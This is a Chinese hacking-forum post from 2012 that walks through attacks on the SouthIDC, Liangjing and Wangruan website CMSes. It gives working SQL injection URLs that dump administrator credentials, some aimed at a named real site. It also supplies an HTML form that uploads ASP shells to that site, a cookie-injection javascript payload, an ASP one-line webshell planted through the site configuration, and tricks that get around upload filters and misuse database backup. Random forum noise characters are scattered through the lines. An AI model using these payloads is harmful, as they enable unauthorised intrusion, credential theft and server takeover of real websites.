找回密码
 立即注册
查看: 3281|回复: 0
打印 上一主题 下一主题

南方数据网站管理系统注入漏洞&后台拿WebShell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:06:42 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
  /Databases/0791idc.mdb
! e2 r" y$ q+ M0 {2 Z6 B1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7
  n) P. ^" E5 L5 s' K  \也可能是(另外一个版本)news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7
" p  w0 c! [4 Y5 C7 a直接暴管理员帐号密码(md5)
$ E, y* z; U% R' c- ~2.登陆后台
- }; R! k4 e9 X3 }, C* \2 s* F0 {3.利用编辑器上传:
- `! {( f  N- r) _* L! G访问admin/southidceditor/admin_style.asp# r2 H$ \, ^3 A, t6 l  t" u" D  [
修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传.
! `; P- o7 i* ~% w* V( {, @8 P
) P& N& ~2 [4 O4 \0 N0 Z6 r& g========================================' s6 V# M' Z0 Q1 G1 h
) `# r# }" r! W8 g4 \
参考资料整理:
( k7 T' n1 q# i' O; s南方数据、良精系统、网软天下漏洞利用' ?  b+ L9 P6 _! B

, f$ S; Z1 f9 R9 I3 a- j+ r1、通过upfile_other.asp漏洞文件直接取SHELL) R/ n  k! b$ M& U: k/ J" t: O3 Y7 z
直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:& V) P( o/ u5 ?4 h' W7 B) @" T
<HTML><HEAD> 1 v; j* P* w6 _  U: l  b
<META http-equiv=Content-Type content="text/html; charset=gb2312">
# A: E) ?% [, ~$ k<STYLE type=text/css>BODY {
# |$ ^: x$ M. iFONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee & r4 z, U, ?) Z7 v. t
}
7 v, p4 L( t: a" o.tx1 {
1 P/ C* d4 @2 q( c; n! ~BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px
  M1 y0 Q+ V  [9 X}
- F& _8 [3 r6 a2 v; R0 J* w  o</STYLE>
- e: ~: |, A/ r# Y<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD> . N$ c: J# x5 L4 }
<BODY leftMargin=0 topMargin=0>
  w! j$ w# s% \6 S<FORM name=form1 action="http://www.huobaodidai.cn/upfile_Other.asp"; method=post 5 W8 K5 d- _8 L% z6 K& K3 m
encType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT xxxxx="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit>
5 f2 Z) |' N' {" X! U; I! x0 D<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>
2 z5 `+ \, ~3 F% `7 e9 J( b: l% D- t
* z( q, [0 |7 o将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer、.asa或asp文件上传(后面需要加一个空格,貌似在IE8中进行使用不能后面加空格,加空格时就弹出选择文件对话框,我是找不到解决办法)。
) Z& V$ \5 k4 W2 K注:此方法通杀南方数据、良精系统、网软天下等
) V# X/ \' l6 h
5 ]7 o+ t- M6 m2 q7 \4 k6 K7 ~4 N2、通过注入秒杀管理员帐号密码,使用如下:9 A/ n, S/ H7 D2 k
http://www.huobaodidai.cn/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20’’=’
3 Y4 v9 e+ ^" t4 Y, A7 m以上代码直接暴管理员帐号和密码,取SHELL方法如下:6 ~0 @0 l" e) |+ M$ m2 O
在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入 "%><%eval(request(chr(35)))%><%’
3 I# J" O$ `9 q# E3 d- B成功把shell写入http://www.target.com/inc/config.asp
7 x, m. e- F$ b/ f" `这里一句话chr(32)密码是“#”. L* |! r/ m  w' J! g/ J1 ]
3、cookie注入
# w, j7 R( H, R" p( h7 g( {6 I/ d清空地址栏,利用union语句来注入,提交:+ ^! q4 p2 i& \' ]2 L: x( q
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))
# l: Y* z8 {8 W( [# x2 u( [如果你牛你就手工,反正我是不会,用刺猬大哥的“cookie注入转换工具”方便又迅速何乐而不为?0 H. O  M2 P  Z: @  b- f
注:貌似南方数据、良精系统、网软天下等系统也都存在COOKIE注入。' B/ g  m. {# z  w$ d3 w
(当然南方不只有上面三个漏洞,还有几个漏洞貌似不常用,反正我给我常用的总结出来希望对大家有帮助)  f* X9 ^! t2 b2 ^5 x
. M% L& S+ g, @5 A* _. ~  ^5 h& Z# Y
三、后台取SHELL方法总结
! `$ c% C6 O' b(1)在系统管理中的网站配置中插入一句话马:进入后台后,点左边的”系统管理”再点击”网站配置”在右边的”网站名称”(也可以在其它处)后加入"%><%Eval(Request(chr(112)))%><%’,再点保存配置,如图:
4 ]: b. \. a: T( Q3 W# O5 ?然后我们打开inc/config.asp文件,看到一句话马已写入到配置文件中了,9 O* O+ h) {) Z
这时再打开一句话马的客户端,提交同样得到一个小马
3 i2 Z3 L) a' h. v* p(注:以下均在其它网站上测试所截的图,为防止信息泄漏,未截留网站连接,请谅解!)
0 B' T5 D- U) z( W7 ~(2)后台上传漏洞,在Upfile_Photo.asp文件中部分代码片段如下:3 }. ~- b6 x. _! l  d+ w
if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then$ X( ?) x7 J: J
EnableUpload=false# p, p* t% w+ H: ~- o

- W! ^* n1 ^1 J" d! tend if + {+ N# O" N2 F" ~3 `% s
if EnableUpload=false then
0 X( e. m8 C" N# R  T7 Omsg="这种文件类型不允许上传!nn只允许上传这几种文件类型:" & UpFileType
% x) q& B& J: W: zFoundErr=true4 c# H0 ]$ d8 i+ \9 p% C) l( Q
end if: I7 y5 i& I8 Q' q% [; z
大家可以看到程序只限制了对"asp","asa","aspx"类的文件上传,我们只要在”网站配置”的允许的上传文件类型处增加上传“cer“等被服务器可解析的文件类型就可,如图:' a" j+ B6 H& J! }: ?
提交时却显示下载页面 ,上传其它如”htr,cdx”等后缀文件时,提交时服务器却不请求(只能说运气不好吧)
5 Y# J; X$ |/ n: {, g0 O(3)后台备份,直接在”产品管理”下的添加产品中上传jpg后缀的asp马,再到”系统管理”下的数据库备份,在”当前数据库路径”栏填入上传的路径,在” 备份数据库名称”填入你要备份马的名称,不过系统会在名称后自动添加上.asa的# `0 V1 `" I' R
1 x# q4 p9 Q# g5 a" `# `' c
点”确定”后提示”备份数据库成功….”不过实际文件是没有.asa的
3 |3 \. a; w4 s, {直接访问备份后的地址,就得到一个webshell8 Q% E' W# \! H0 `* K5 q8 h
(以上虽用网软做的后台演示,但南方和良精后台取shell都是大同小异的)​
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表